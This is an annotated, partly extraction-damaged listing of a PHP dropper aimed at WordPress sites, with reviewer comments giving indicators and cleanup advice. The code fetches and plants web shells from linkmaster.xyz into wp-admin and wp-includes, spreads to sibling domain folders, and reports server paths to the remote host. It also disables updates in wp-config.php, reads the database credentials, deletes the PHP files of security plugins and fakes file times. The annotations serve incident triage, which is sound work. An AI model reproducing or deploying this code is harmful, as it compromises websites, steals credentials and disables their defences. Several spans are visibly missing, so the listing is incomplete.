/*
 * NOTE(review): extraction-damaged listing of a PHP dropper aimed at WordPress installs.
 * The opening PHP tag, the class header and the start of the constructor are missing, and
 * spans that contained markup (echoed HTML, the replacement argument of both preg_replace
 * calls, the renderUI template, the instantiation line) have been stripped. The code is
 * kept exactly as published; nothing missing has been reconstructed.
 *
 * What the visible code establishes, for triage:
 *  - control surface: GET parameter `yap` and four POST field names; no authentication
 *    check appears in the visible code (the start of the constructor is cut off);
 *  - outbound HTTPS to linkmaster.xyz (with and without `www.`) for payloads and reporting;
 *  - files written under wp-admin/, wp-includes/ and next to the script;
 *  - wp-config.php is read (DB_NAME / DB_USER / DB_PASSWORD) and modified;
 *  - PHP files of listed file-manager and security plugins are deleted.
 * Remediation should compare wp-admin/ and wp-includes/ against the official core checksums
 * for the installed version rather than rely on file names or modification times.
 */

/* Tail of the constructor; its start is outside the listing (the first token is presumably
 * the documentRoot property assignment, to be confirmed against an intact sample). Takes the
 * document root from $_SERVER with getcwd() as fallback, exits with 'ERR' if it is empty or
 * not a directory, and derives scheme, full request URL and base URL from $_SERVER. */
documentRoot = $_SERVER['DOCUMENT_ROOT'] ?? getcwd();
if(empty($this->documentRoot) || !is_dir($this->documentRoot)) exit('ERR');
$this->protocol = (isset($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!='off'||$_SERVER['SERVER_PORT']==443)?'https://':'http://';
$this->currentUrl = $this->protocol.( $_SERVER['HTTP_HOST']??'' ).( $_SERVER['REQUEST_URI']??'' );
$this->baseUrl = $this->protocol.( $_SERVER['HTTP_HOST']??'' );
}

/* Entry point. The GET parameter `yap` is checked against five fixed names and dispatched
 * to a method named handle<name>Action; any POST request is additionally routed to
 * handlePostRequests(). Of the five dispatch targets only handleDownsAction is defined in
 * the visible listing. Detection: web-server access-log entries carrying a `yap=` query
 * parameter are a hunting lead. */
public function handleRequest() {
    $action = $_GET['yap']??'';
    $actions = ['downs','self_destruct','wpconfig','Filemanager','wpcache'];
    if(in_array($action,$actions)) $this->{'handle'.$action.'Action'}();
    if($_SERVER['REQUEST_METHOD']=='POST') $this->handlePostRequests();
}

/* Handler for yap=downs. Builds three same-host URLs pointing at /wp-config-sample.php with
 * other `yap` values (which suggests the script is deployed under that file name; confirm on
 * the affected host) and one remote bget.php URL carrying the URL-encoded current URL. What
 * is echoed for each URL was lost in extraction. Then runs the installer and the domain
 * report. */
private function handleDownsAction() {
    $urls = [
        $this->baseUrl.'/wp-config-sample.php?yap=wpconfig',
        $this->baseUrl.'/wp-config-sample.php?yap=Filemanager',
        $this->baseUrl.'/wp-config-sample.php?yap=self_destruct',
        'https://www.linkmaster.xyz/bget.php?auto='.urlencode($this->currentUrl)
    ];
    foreach($urls as $url) echo '';
    $this->downloadAndInstallFiles();
    $this->renderDomainIframe();
}

/* Maps eight remote .txt URLs to local destinations: two beside this script, two one
 * directory above it, and four under <document root>/wp-includes/ (one of them named
 * logo.png). Each is fetched and written by downloadFile(); the two further install stages
 * are then called. The destination paths below are file-system indicators for this sample. */
private function downloadAndInstallFiles() {
    $remoteFiles = [
        'https://linkmaster.xyz/uzak/style.txt' => __DIR__.'/style.php',
        'https://linkmaster.xyz/uzak/template.txt' => __DIR__.'/template.php',
        'https://linkmaster.xyz/uzak/wp-css.txt' => dirname(__DIR__).'/wp-css.php',
        'https://linkmaster.xyz/uzak/theme.txt' => dirname(__DIR__).'/theme.php',
        'https://linkmaster.xyz/uzak/zip.txt' => $this->documentRoot.'/wp-includes/dist.php',
        'https://linkmaster.xyz/uzak/yeni.txt' => $this->documentRoot.'/wp-includes/pomo/pomo.php',
        'https://linkmaster.xyz/uzak/control.txt' => $this->documentRoot.'/wp-includes/blocks/comments/blocks.php',
        'https://linkmaster.xyz/uzak/logo.txt' => $this->documentRoot.'/wp-includes/blocks/comments/logo.png'
    ];
    foreach($remoteFiles as $url=>$path) $this->downloadFile($url,$path);
    $this->installAdditionalShells();
    $this->scanAndInstallOnAllDomains();
}

/* Fourteen further URL/destination pairs. The author's own naming (this method's name and
 * the /svs/shell/ URL path) labels the payloads as shells; their contents are not visible
 * here. Each payload is first written to its base name in the current working directory and
 * then renamed into place under wp-admin/ or wp-includes/; if the rename fails, the
 * downloaded copy is left in the working directory. On success a check mark and the
 * HTML-escaped file name are echoed (surrounding markup lost in extraction). */
private function
installAdditionalShells() {
    $root = $this->documentRoot;
    $shells = [
        ["https://linkmaster.xyz/svs/shell/fmadmin.txt","$root/wp-admin/fmadmin.php"],
        ["https://linkmaster.xyz/svs/shell/fmanager.txt","$root/wp-admin/css/midnight/fmanager.php"],
        ["https://linkmaster.xyz/svs/shell/adminer.txt","$root/wp-admin/css/modern/adminer.php"],
        ["https://linkmaster.xyz/svs/shell/wordpress.txt","$root/wp-admin/user/wordpress.php"],
        ["https://linkmaster.xyz/svs/shell/niil.txt","$root/wp-includes/css/dist/niil.php"],
        ["https://linkmaster.xyz/svs/shell/sok.txt","$root/wp-includes/css/dist/sok.php"],
        ["https://linkmaster.xyz/svs/shell/system.txt","$root/wp-includes/Requests/src/system.php"],
        ["https://linkmaster.xyz/svs/shell/tiny.txt","$root/wp-includes/Requests/src/Utility/tiny.php"],
        ["https://linkmaster.xyz/svs/shell/yeni.txt","$root/wp-includes/SimplePie/Content/Type/yeni.php"],
        ["https://linkmaster.xyz/svs/shell/zip-blog.txt","$root/wp-includes/SimplePie/Content/Type/zip-blog.php"],
        ["https://linkmaster.xyz/svs/shell/scan.txt","$root/wp-includes/blocks/audio/scan.php"],
        ["https://linkmaster.xyz/svs/shell/zip-header.txt","$root/wp-includes/blocks/audio/zip-header.php"],
        ["https://linkmaster.xyz/uzk/otomatik/blog/wordpress.txt","$root/wp-admin/maint/wordpress.txt"],
        ["https://linkmaster.xyz/uzk/otomatik/blog/wp-blog.txt","$root/wp-admin/maint/wp-blog.php"]
    ];
    foreach($shells as $f){
        $tmp = basename($f[1]);
        if($this->downloadFile($f[0],$tmp) && $this->moveFile($tmp,$f[1])){
            echo '
✓ '.htmlspecialchars($tmp).'
';
        }
    }
}

/* Spread to sibling sites. Starting at the document root and walking up five parent levels,
 * every non-hidden subdirectory whose name ends in a dot followed by two or more letters
 * (i.e. looks like a domain name) is passed to processDomainFolder(), and the collected
 * names are handed to reportDomains(). Incident scope should therefore be assumed to include
 * sibling sites reachable from these directories, not only the site where the script was
 * found. */
private function scanAndInstallOnAllDomains() {
    $dirs = [$this->documentRoot];
    for($i=0;$i<5;$i++) $dirs[] = @dirname(end($dirs));
    $domains = [];
    foreach($dirs as $d) if(is_dir($d)){
        $sc = @scandir($d);
        if($sc) foreach($sc as $f){
            if($f!='.'&&$f!='..'&&!str_starts_with($f,'.')&&preg_match('/\.[a-z]{2,}$/i',$f)&&is_dir($d.'/'.$f)){
                $domains[]=$f;
                $this->processDomainFolder($d.'/'.$f);
            }
        }
    }
    $this->reportDomains($domains);
}

/* Treats a folder as a WordPress install when readme.html exists in it or in its
 * public_html subfolder, then calls updateWpConfigForDomain() and installFilesToDomain() on
 * that folder. installFilesToDomain() is not intact in this listing. */
private function processDomainFolder($path) {
    $readme = $path.'/readme.html';
    $target = $path;
    if(!file_exists($readme)){
        $pub = $path.'/public_html';
        if(is_dir($pub)){
            $target=$pub;
            $readme=$pub.'/readme.html';
        }
    }
    if(file_exists($readme)){
        $this->updateWpConfigForDomain($target);
        $this->installFilesToDomain($target);
    }
}

/* Reads the sibling site's wp-config.php and prepares four define() lines that switch off
 * the built-in file editor, file modifications and automatic updates. Detection: these
 * constants appearing in wp-config.php without the site owner having added them mean the
 * site will no longer update itself. */
private function updateWpConfigForDomain($path) {
    $cfg = $path.'/wp-config.php';
    if(file_exists($cfg)){
        $c = file_get_contents($cfg);
        $code = "define('DISALLOW_FILE_EDIT',true);\ndefine('DISALLOW_FILE_MODS',true);\ndefine('AUTOMATIC_UPDATER_DISABLED',true);\ndefine('WP_AUTO_UPDATE_CORE',false);";
        if(strpos($c,$code)===false){
            /* NOTE(review): text is missing from the next line. The replacement argument,
             * the write-back of the file, the end of this method and the header of the
             * following method (presumably installFilesToDomain) were stripped in
             * extraction; only the tail of a downloadFile() call survives. */
            $c = preg_replace('/<\?php/','downloadFile($f[0],$f[1]); }

/* Sends the server name, the '|'-joined list of discovered domain folders, the current URL
 * and the document root as query parameters to domain.php on the remote host. Detection:
 * outbound requests from the web server to that host in proxy or firewall logs. */
private function reportDomains($d) {
    if(empty($d)) return;
    $list=implode('|',$d);
    $dom=$_SERVER['SERVER_NAME']??'';
    $url = 'https://www.linkmaster.xyz/domain.php?bildir='.urlencode($dom). '&site='.urlencode($list).'&anadomain='.urlencode($this->currentUrl). '&path='.urlencode($this->documentRoot);
    $this->curlGet($url);
}

/* Repeats the directory scan of scanAndInstallOnAllDomains() without installing anything and
 * builds the same reporting URL. What is echoed is lost in extraction; the method name
 * suggests the URL was embedded in an iframe, which would make the visitor's browser issue
 * the request. */
private function renderDomainIframe() {
    $dirs = [$this->documentRoot];
    for($i=0;$i<5;$i++) $dirs[]= @dirname(end($dirs));
    $domains = [];
    foreach($dirs as $d) if(is_dir($d)){
        $sc=@scandir($d);
        if($sc) foreach($sc as $f){
            if($f!='.'&&$f!='..'&&!str_starts_with($f,'.')&&preg_match('/\.[a-z]{2,}$/i',$f)&&is_dir($d.'/'.$f)) $domains[]=$f;
        }
    }
    if(!empty($domains)){
        $list=implode('|',$domains);
        $dom=$_SERVER['SERVER_NAME']??'';
        $url = 'https://www.linkmaster.xyz/domain.php?bildir='.urlencode($dom).
'&site='.urlencode($list).'&anadomain='.urlencode($this->currentUrl). '&path='.urlencode($this->documentRoot);
        echo '';
    }
}

/* Fetches $url with cURL and writes the body to $dest, creating the directory (mode 0755)
 * if needed. Returns false when the transfer or the write fails, true otherwise. TLS peer
 * verification is disabled, redirects are followed and a browser-like User-Agent is sent.
 * When a readme.html exists in the destination directory, the new file's modification time
 * is set to that of readme.html, so mtime cannot be relied on to spot files written this
 * way; use content hashes or core checksums instead. */
private function downloadFile($url,$dest) {
    $ch=curl_init();
    curl_setopt_array($ch,[
        CURLOPT_URL=>$url,CURLOPT_RETURNTRANSFER=>1,CURLOPT_FOLLOWLOCATION=>1,
        CURLOPT_SSL_VERIFYPEER=>0,CURLOPT_CONNECTTIMEOUT=>15,CURLOPT_TIMEOUT=>45,
        CURLOPT_USERAGENT=>'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    ]);
    $c=curl_exec($ch);
    curl_close($ch);
    if($c===false) return false;
    $dir=dirname($dest);
    if(!is_dir($dir)) mkdir($dir,0755,true);
    $w=file_put_contents($dest,$c);
    if($w===false) return false;
    $readme=dirname($dest).'/readme.html';
    if(file_exists($readme)) touch($dest,filemtime($readme));
    return true;
}

/* Plain GET via cURL with TLS peer verification disabled and redirects followed; returns
 * the response body, or false on failure. Used here for the reporting call. */
private function curlGet($url) {
    $ch=curl_init();
    curl_setopt_array($ch,[
        CURLOPT_URL=>$url,CURLOPT_RETURNTRANSFER=>1,CURLOPT_FOLLOWLOCATION=>1,
        CURLOPT_SSL_VERIFYPEER=>0,CURLOPT_TIMEOUT=>30
    ]);
    $c=curl_exec($ch);
    curl_close($ch);
    return $c;
}

/* Creates the destination directory (mode 0755) if needed and renames $src to $dst;
 * returns the result of rename(). */
private function moveFile($src,$dst) {
    $dir=dirname($dst);
    if(!is_dir($dir)) mkdir($dir,0755,true);
    return rename($src,$dst);
}

/* Deletes this script file and exits. Nothing written by the install methods is removed
 * here, so the absence of the dropper on disk does not indicate a clean site. */
private function selfDestruct() {
    @unlink(__FILE__) && exit(0);
}

/* Same wp-config.php change as updateWpConfigForDomain(), applied to the current site's
 * document root (the four define() lines appear in a different order). */
private function updateWpConfig() {
    $cfg=$this->documentRoot.'/wp-config.php';
    if(file_exists($cfg)){
        $c=file_get_contents($cfg);
        $code="define('DISALLOW_FILE_EDIT',true);\ndefine('WP_AUTO_UPDATE_CORE',false);\ndefine('DISALLOW_FILE_MODS',true);\ndefine('AUTOMATIC_UPDATER_DISABLED',true);";
        if(strpos($c,$code)===false){
            /* NOTE(review): text is missing from the next line. The replacement argument and
             * the write-back were stripped in extraction; the surviving string is Turkish
             * for "wp-config updated". */
            $c=preg_replace('/<\?php/','wp-config güncellendi');
        }
    }
}

/* For each listed plugin directory that exists under wp-content/plugins/, removes its PHP
 * files via deletePhpFiles(). The list mixes file-manager plugins with two security plugins
 * (wordfence, malcare-security). Detection: one of these plugin folders still present but
 * without PHP files, or containing files whose extension is `php1`. The echoed text is
 * Turkish for "File Manager cleaned". */
private function handleFileManager() {
    $plugins = ['file-manager','filemanager','file-manager-advanced','wordfence','malcare-security','wp-file-manager','file_manager','wp_file_manager','file_manager_advanced_ui'];
    $path = $this->documentRoot.'/wp-content/plugins/';
    foreach($plugins as $p) if(is_dir($path.$p)) $this->deletePhpFiles($path.$p);
    echo '
File Manager temizlendi
';
}

/* Recursively walks $dir; every file whose extension is exactly 'php' is unlinked, and if
 * the unlink fails the file is renamed with a trailing '1' instead. Other files and the
 * directories themselves are left in place. */
private function deletePhpFiles($dir) {
    $files = array_diff(scandir($dir),['.','..']);
    foreach($files as $f){
        $p = $dir.'/'.$f;
        is_dir($p) ? $this->deletePhpFiles($p) : (pathinfo($p,PATHINFO_EXTENSION)=='php' ? @unlink($p)?:@rename($p,$p.'1') : null);
    }
}

/* Recursively deletes wp-content/cache and the directories of four caching plugins when
 * they exist. The echoed text is Turkish for "Cache cleaned". */
private function clearCache() {
    $caches = [
        $this->documentRoot.'/wp-content/cache',
        $this->documentRoot.'/wp-content/plugins/wp-rocket',
        $this->documentRoot.'/wp-content/plugins/w3-total-cache',
        $this->documentRoot.'/wp-content/plugins/wp-super-cache',
        $this->documentRoot.'/wp-content/plugins/litespeed-cache'
    ];
    foreach($caches as $p) if(is_dir($p)) $this->deleteDirectory($p);
    echo '
Cache temizlendi
';
}

/* Recursive delete: unlinks every file below $dir, then removes the directories. Errors are
 * suppressed, so a partial deletion is not reported. */
private function deleteDirectory($dir) {
    if(!file_exists($dir)) return;
    $files = array_diff(scandir($dir),['.','..']);
    foreach($files as $f){
        $p = $dir.'/'.$f;
        is_dir($p) ? $this->deleteDirectory($p) : @unlink($p);
    }
    @rmdir($dir);
}

/* POST dispatcher: the mere presence of one of four field names (self_destruct,
 * close_wp_config, delete_filemanager, clear_cache) triggers the matching method. Detection:
 * POST requests to the script's path; request bodies are usually not in access logs, so the
 * path and method are the practical filter. */
private function handlePostRequests() {
    isset($_POST['self_destruct']) && $this->selfDestruct();
    isset($_POST['close_wp_config']) && $this->updateWpConfig();
    isset($_POST['delete_filemanager']) && $this->handleFileManager();
    isset($_POST['clear_cache']) && $this->clearCache();
}

/* Operator page. The template markup was stripped in extraction and the remainder is kept
 * verbatim below. What survives shows the page prints the document root and runs three
 * regular expressions over wp-config.php to capture DB_NAME, DB_USER and DB_PASSWORD; what
 * is echoed afterwards is not visible, but the database credentials of an affected site
 * should be treated as exposed and rotated. The final line is what remains of the code that
 * instantiates the class and calls handleRequest() and renderUI(). */
public function renderUI() { ?> WP Manager

WordPress Manager

Root: documentRoot)?>

DB Info:

documentRoot.'/wp-config.php'; if(file_exists($cfg)){ $c=file_get_contents($cfg); preg_match("/define\s*\(\s*'DB_NAME'\s*,\s*'([^']*)'\s*\);/",$c,$db); preg_match("/define\s*\(\s*'DB_USER'\s*,\s*'([^']*)'\s*\);/",$c,$u); preg_match("/define\s*\(\s*'DB_PASSWORD'\s*,\s*'([^']*)'\s*\);/",$c,$p); echo ''; } ?>
handleRequest(); $m->renderUI(); ?>